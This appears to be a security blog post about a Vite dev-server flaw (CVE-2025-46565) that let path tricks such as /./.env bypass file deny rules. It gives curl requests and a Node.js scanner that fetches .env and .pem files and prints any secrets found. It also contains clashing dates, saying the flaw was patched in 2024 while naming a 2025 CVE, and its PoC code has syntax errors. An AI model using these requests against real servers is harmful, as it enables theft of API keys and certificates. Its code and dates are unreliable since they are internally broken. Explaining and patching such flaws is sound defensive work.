Vite, the blazing-fast frontend tooling framework loved by modern JavaScript developers, recently faced a significant security flaw (CVE-2025-46565) that exposed sensitive files during development. Even though this vulnerability was patched in June 2024, many developers are still unaware of how dangerous it was—and how simple its exploitation could be. In this post, we’ll break down what happened, show you a proof-of-concept, and explain what you can do to keep your local secrets safe.

Background: What is Vite and Why Should You Care?

Vite is a popular next-generation frontend build tool. Many React, Vue, and Svelte apps use Vite for its speed and simplicity. During development, Vite spins up a local web server so you can preview and hot-reload your work.

Now, imagine exposing this dev server on your local network—maybe for mobile testing or team demos.

Here's the trouble:
Vite (before patched versions) tried to protect sensitive files—like .env or SSL certificates—from being served in the browser. It excludes files matching patterns like .env, .env.*, *.crt, or *.pem through the server.fs.deny option. But, the check had a flaw.

The Vulnerability Explained

By using a special path trick—adding a combination of slash and dot (/.) in URLs—an attacker could _bypass_ these deny patterns. For example, instead of requesting /.env (which Vite blocked), you could try /./.env or /projectRoot/./.env, and Vite would serve the file in the browser.

Key points

- Only apps where Vite’s dev server is accessible from the network are at risk (those started with vite --host or server.host: '...').

Let’s say you’re running Vite like this

vite --host

Or in your vite.config.js

export default {
  server: {
    host: true // or '...'
  }
}

If your .env contains secret API keys

VITE_API_KEY=shhhSuperSecret

Normally, curl http://localhost:5173/.env will NOT reveal the contents, as it's denied.

But, with the exploit

curl http://localhost:5173/./.env

Or even

curl http://localhost:5173/somepath/../../.env
curl http://localhost:5173/%2e/%2eenv  # URL-encoded

One of these could yield

VITE_API_KEY=shhhSuperSecret

☠️ _Sensitive secrets leaked to anyone on your network!_

Here’s a Node.js proof-of-concept that scans for exposed files over the network

const axios = require('axios');

const targets = [
  'http://localhost:5173/./.env',
  'http://localhost:5173/%2e/%2eenv',
  'http://localhost:5173/./certs/server.pem';,
  // Add more patterns as needed
];

(async () => {
  for (let url of targets) {
    try {
      const res = await axios.get(url);
      if (res.data.match(/VITE_|-----BEGIN/)) {
        console.log([!] Exposed file found at: ${url});
        console.log(res.data);
      }
    } catch (e) {
      // Ignore 404
    }
  }
})();

Vite Security Advisory:

GitHub Security Advisory GHSA-7c5m-hmf9-5mqq

Patched Versions:

Vite Releases

CVEs:

CVE-2025-46565 on NVD *(link may not be live yet)*

Follow Upstream Guidance:

- Subscribe to the Vite repo security advisories.

Closing Thoughts

CVE-2025-46565 is a classic lesson: _Even dev tools need robust security_. Local secrets are just as valuable to attackers, and a simple misconfiguration or path normalization bug can have real consequences. Always use the latest versions, lock down network-exposed dev tools, and be alert to new advisories.

If you found this write-up useful—share it with your team, and keep your secrets secret!


*Written exclusively for your security toolbox. Stay safe out there!*

Timeline

Published on: 05/01/2025 18:15:57 UTC
Last modified on: 05/02/2025 18:15:27 UTC